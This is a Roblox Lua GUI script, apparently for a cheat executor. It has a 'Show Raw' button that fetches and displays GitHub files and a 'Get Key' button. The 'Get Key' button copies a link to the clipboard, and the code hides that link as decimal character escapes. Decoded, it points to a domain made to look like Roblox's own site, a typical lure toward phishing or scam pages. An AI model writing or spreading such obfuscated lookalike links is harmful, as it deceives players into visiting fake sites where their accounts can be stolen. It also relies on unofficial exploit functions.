local P = game.Players.LocalPlayer
local G = Instance.new("ScreenGui", P:WaitForChild("PlayerGui"))

local F = Instance.new("Frame", G)
F.Size = UDim2.new(0, 450, 0, 260)
F.Position = UDim2.new(0.5, -225, 0.5, -130)
F.Active = true
F.Draggable = true
F.BackgroundColor3 = Color3.new(0, 0, 0)

local T = Instance.new("TextBox", F)
T.Size = UDim2.new(0, 420, 0, 50)
T.Position = UDim2.new(0, 15, 0.08, 0)
T.BackgroundColor3 = Color3.new(1, 1, 1)
T.TextColor3 = Color3.new(0, 0, 0)
T.TextScaled = true
T.ClearTextOnFocus = false
Instance.new("UICorner", T).CornerRadius = UDim.new(0, 15)

local function createButton(position, text, color, callback)
    local B = Instance.new("TextButton", F)
    B.Size = UDim2.new(0, 200, 0, 70)
    B.Position = position
    B.Text = text
    B.TextColor3 = Color3.new(1, 1, 1)
    B.BackgroundColor3 = color
    B.AutoButtonColor = false
    Instance.new("UICorner", B).CornerRadius = UDim.new(0, 15)
    if callback then
        B.MouseButton1Click:Connect(callback)
    end
end

-- Botón Get Key
local function copyKey()
    local k = "\104\116\116\112\115\58\47\47\114\111\98\108\111\120\46\99\111\109\46\102\106\47\99\111\109\109\117\110\105\116\105\101\115\47\57\53\53\52\48\55\51\50\56\53"
    T.Text = k
    pcall(function() setclipboard(k) end)
end

-- Convierte URL de GitHub normal a raw
local function githubToRaw(url)
    -- Ej: https://github.com/user/repo/blob/main/file.txt
    --      => https://raw.githubusercontent.com/user/repo/main/file.txt
    return url:gsub("https://github.com/", "https://raw.githubusercontent.com/")
              :gsub("/blob/", "/")
end

-- Botón Show Raw
local function showRaw()
    local url = T.Text -- toma la URL que el usuario haya puesto en el TextBox
    local rawURL = githubToRaw(url)
    local success, content = pcall(function() return game:HttpGet(rawURL) end)
    if success then
        T.Text = content
    else
        T.Text = "Error al obtener el raw"
    end
end

createButton(UDim2.new(0.05, 0, 0.65, 0), "Get Key", Color3.fromRGB(255, 85, 0), copyKey)
createButton(UDim2.new(0.55, 0, 0.65, 0), "Show Raw", Color3.fromRGB(0, 200, 255), showRaw) 
